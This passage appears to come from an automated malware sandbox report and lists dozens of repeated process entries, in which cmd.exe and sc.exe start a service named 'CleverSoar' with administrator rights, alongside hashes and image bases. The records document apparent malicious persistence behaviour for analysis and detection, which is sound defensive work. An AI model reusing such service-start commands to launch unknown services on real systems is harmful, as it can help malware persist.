                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:17
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:18
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:20
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:21
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:23
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:24
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:03:10:54
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:35
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:36
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:37
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:38
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:39
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:41
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:42
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:43
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:44
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:45
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:46
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:47
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:48
                                      Start time:03:10:55
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:49
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:50
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:51
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:52
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:53
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:54
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:55
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:56
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:57
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:58
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:59
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:60
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:61
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:62
                                      Start time:03:10:56
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:63
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:64
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:65
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:66
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:67
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:68
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:69
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:70
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:71
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:72
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:73
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:74
                                      Start time:03:10:57
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:75
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:76
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:77
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:78
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:79
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:80
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
                                      Wow64 process (32bit):false
                                      Commandline:sc start CleverSoar
                                      Imagebase:0x7ff7c0c00000
                                      File size:72'192 bytes
                                      MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:81
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6d64d0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:82
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd /c start sc start CleverSoar
                                      Imagebase:0x7ff7d02b0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:83
                                      Start time:03:10:58
                                      Start date:23/12/2024
                                      Path:C:\Windows\System32\sc.exe
